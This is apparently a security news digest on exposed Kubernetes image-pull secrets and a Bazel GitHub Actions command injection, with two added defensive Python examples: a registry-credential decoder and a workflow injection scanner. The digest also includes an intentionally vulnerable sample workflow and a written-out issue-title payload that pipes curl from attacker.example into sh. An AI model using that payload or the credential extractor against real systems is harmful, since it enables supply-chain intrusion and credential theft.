Numerous organizations and open-source projects could be exposed to supply chain attacks through publicly exposed Kubernetes secrets that grant access to sensitive Software Development Life Cycle environments, according to SecurityWeek.
Nearly 46% of the Kubernetes .dockerconfigjson and .dockercfg secrets that held base64-encoded username and password values contained valid registry credentials, most of them with both push and pull privileges to registries holding private container images, a report from Aqua Security revealed. The researchers also found a key for SAP's Artifacts repository, which held more than 95 million artifacts, including ones belonging to various Fortune 500 firms and two leading blockchain companies.
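An added example (not code from the Aqua report, SecurityWeek, or any of the named vendors) of how those secret types carry registry credentials: a kubernetes.io/dockerconfigjson Secret stores an entire Docker config.json under the .dockerconfigjson key, and the legacy kubernetes.io/dockercfg type stores the older registry-to-auth map under .dockercfg; in both, each registry entry's `auth` value is base64 of `user:password`, so a leaked manifest is a plaintext credential one decode away. The script below decodes either form and lists what a given Secret exposes. The manifests, registry names and credentials are constructed for the example.

```python
"""Added example: enumerate the registry credentials an exposed
Kubernetes image-pull Secret contains (not the report's own code)."""
import base64
import json


def _b64decode(value: str) -> bytes:
    # Tolerate stripped padding, which is common in hand-edited manifests.
    value = value.strip()
    return base64.b64decode(value + "=" * (-len(value) % 4))


def registry_credentials(secret: dict) -> list:
    """Return one record per registry in a kubernetes.io/dockerconfigjson or
    kubernetes.io/dockercfg Secret. The `auth` field is base64("user:password");
    secrets generated by `kubectl create secret docker-registry` also carry
    explicit username/password keys, used here only when `auth` is absent."""
    data = secret.get("data") or {}
    if ".dockerconfigjson" in data:
        # Whole ~/.docker/config.json, so the registries live under "auths".
        auths = json.loads(_b64decode(data[".dockerconfigjson"])).get("auths", {})
    elif ".dockercfg" in data:
        # Legacy format: the top-level object is already the registry map.
        auths = json.loads(_b64decode(data[".dockercfg"]))
    else:
        return []

    records = []
    for registry, entry in auths.items():
        username = entry.get("username")
        password = entry.get("password")
        if entry.get("auth"):
            decoded = _b64decode(entry["auth"]).decode("utf-8", "replace")
            if ":" in decoded:
                username, _, password = decoded.partition(":")
            else:
                # Not user:password; Docker itself rejects this form, so there
                # is no usable credential to report.
                username = password = None
        records.append({
            "secret": secret.get("metadata", {}).get("name", "<unnamed>"),
            "registry": registry,
            "username": username or None,
            "password": password or None,
        })
    return records


def redacted(records: list) -> list:
    """Report-safe view: keep the registry and user, hide the password."""
    return [{**r, "password": None if r["password"] is None else "*" * 8}
            for r in records]


def _auth(user: str, password: str) -> str:
    return base64.b64encode(f"{user}:{password}".encode()).decode()


def _secret(name: str, key: str, payload: dict) -> dict:
    # Build a manifest the way the API server stores it: base64 under .data.
    secret_type = ("kubernetes.io/dockerconfigjson" if key == ".dockerconfigjson"
                   else "kubernetes.io/dockercfg")
    return {"apiVersion": "v1", "kind": "Secret", "type": secret_type,
            "metadata": {"name": name},
            "data": {key: base64.b64encode(json.dumps(payload).encode()).decode()}}


# Constructed sample data; no real cluster, registry or credential.
PULL_SECRET = _secret("ci-pull-secret", ".dockerconfigjson", {"auths": {
    "registry.example.com": {"auth": _auth("deploy", "s3cr3t")},
    "ghcr.io": {"username": "bot", "password": "ghp_placeholder",
                "auth": _auth("bot", "ghp_placeholder")},
    "token.example.com": {"auth": base64.b64encode(b"opaque-token").decode()},
}})
LEGACY_SECRET = _secret("old-pull-secret", ".dockercfg", {
    "legacy.example.com": {"auth": _auth("svc", "hunter2"), "email": "svc@example.com"},
})

if __name__ == "__main__":
    for s in (PULL_SECRET, LEGACY_SECRET):
        for rec in redacted(registry_credentials(s)):
            print(rec)
```

Point it at manifests pulled from wherever the Secrets were exposed; whether a decoded credential still works, and whether it carries push rights, can only be established by authenticating to the registry, which the script deliberately does not attempt.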
"The exposure of this Artifacts repository key represented a considerable security risk. The potential threats stemming from such access included the leakage of proprietary code, data breaches, and the risk of supply chain attacks, all of which could compromise the integrity of the organization and the security of its customers," said Aqua Security.
A command injection vulnerability in one of Bazel's GitHub Actions workflows could have allowed threat actors to add malicious code to the production environment of projects using Google's open-source build tool.
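The page gives no details of the Bazel bug, so the following does not reproduce it. As an added example (not Bazel's or any vendor's code), it shows the general GitHub Actions pattern behind this class of finding: a `${{ github.event.* }}` expression interpolated directly into a `run:` script is expanded into the shell text before the shell sees it, so an attacker-controlled issue title or PR body can close the quotes and append commands; routing the value through `env:` and reading it as `"$VAR"` keeps it data. The scanner below flags untrusted contexts inside `run:` steps using the contexts GitHub's own script-injection guidance names (the list is a starting point, not exhaustive). The two workflows are constructed for the example.

```python
"""Added example: flag GitHub Actions `run:` steps that interpolate
attacker-controlled event data, plus the env-variable fix."""
import re

# Contexts GitHub's script-injection guidance lists as attacker-controlled.
UNTRUSTED_CONTEXTS = re.compile(
    r"github\.("
    r"head_ref"
    r"|event\.issue\.(title|body)"
    r"|event\.pull_request\.(title|body|head\.(ref|label|repo\.default_branch))"
    r"|event\.(comment|review|review_comment|discussion)\.body"
    r"|event\.head_commit\.(message|author\.(name|email))"
    r"|event\.commits(\[\d+\]|\.\*)\.(message|author\.(name|email))"
    r"|event\.pages(\[\d+\]|\.\*)\.page_name"
    r")\b"
)
EXPRESSION = re.compile(r"\$\{\{(.*?)\}\}")
RUN_KEY = re.compile(r"(-\s+)?run:\s*(.*)$")


def find_injections(workflow_text: str) -> list:
    """Return (line_number, context) for each untrusted context that is
    expanded inside a `run:` script. Line-based on purpose so it runs
    without a YAML library; it tracks `run: |` block scalars by indent."""
    findings = []
    in_run, run_indent = False, -1
    for lineno, line in enumerate(workflow_text.splitlines(), 1):
        stripped = line.lstrip()
        indent = len(line) - len(stripped)
        # Continuation lines of a block scalar are indented deeper than the key.
        script_line = in_run and (not stripped or indent > run_indent)
        if not script_line:
            in_run = False
        m = RUN_KEY.match(stripped)
        if m:
            script_line = True
            if m.group(2).strip() in ("|", "|-", "|+", ">", ">-", ">+"):
                in_run, run_indent = True, indent + len(m.group(1) or "")
        if not script_line:
            continue  # env:, with:, name: etc. are not shell text
        for expr in EXPRESSION.findall(line):
            hit = UNTRUSTED_CONTEXTS.search(expr)
            if hit:
                findings.append((lineno, hit.group(0)))
    return findings


# Constructed workflows, not from any real repository.
VULNERABLE = """\
name: triage
on: [issues]
jobs:
  label:
    runs-on: ubuntu-latest
    steps:
      - name: Check title
        run: |
          title="${{ github.event.issue.title }}"
          if [[ "$title" =~ ^octocat ]]; then echo "octocat"; fi
      - run: echo "${{ github.event.issue.body }}"
"""

# Same logic, but the untrusted value reaches the shell only as an
# environment variable, so shell quoting protects it.
HARDENED = """\
name: triage
on: [issues]
jobs:
  label:
    runs-on: ubuntu-latest
    steps:
      - name: Check title
        env:
          TITLE: ${{ github.event.issue.title }}
        run: |
          if [[ "$TITLE" =~ ^octocat ]]; then echo "octocat"; fi
"""

if __name__ == "__main__":
    for name, text in (("vulnerable", VULNERABLE), ("hardened", HARDENED)):
        print(name, find_injections(text))
```

An issue titled `x"; curl https://attacker.example/p | sh; echo "` would turn the first workflow's `title=...` line into three commands on the runner; in the second workflow the same title is just the value of `$TITLE`. The scanner covers `run:` only; script inputs to actions such as actions/github-script need the same treatment but are not parsed here.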
Numerous cybersecurity researchers have already published proof-of-concept exploits on GitHub for a critical vulnerability in the open-source automation server Jenkins, BleepingComputer reports.